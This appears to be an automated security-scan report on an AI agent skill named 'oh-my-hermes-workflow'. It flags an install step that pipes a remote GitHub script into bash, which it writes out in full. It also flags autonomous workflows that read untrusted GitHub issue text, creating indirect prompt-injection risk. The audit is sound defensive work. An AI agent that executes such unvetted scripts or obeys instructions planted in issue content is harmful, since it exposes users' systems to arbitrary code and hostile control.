oh-my-hermes-workflow

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 0.80). The set includes an explicit "curl | bash" to a raw.githubusercontent.com install.sh from an unvetted GitHub account/repo (and instructions to run other repository scripts), which is a high-risk pattern for distributing arbitrary/malicious shell code; the other links are mostly docs, API endpoints, or placeholders and are lower risk but do not mitigate the danger of executing the install script.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.80). The skill's autonomous workflows explicitly read and act on user-generated GitHub content (e.g., the "auto-issue-triage" hourly job and "manage-github-issues" / Autonomous CTO Loop in SKILL.md) via the GitHub integration, so untrusted third-party issue text can influence decisions and trigger actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The install instructions explicitly run remote code (curl -fsSL https://raw.githubusercontent.com/salomondiei08/oh-my-hermes/main/install.sh | bash) and provide a git clone (https://github.com/salomondiei08/oh-my-hermes) plus subsequent bash /tmp/oh-my-hermes/install.sh, so the skill runtime/installation fetches and executes required remote code from those URLs.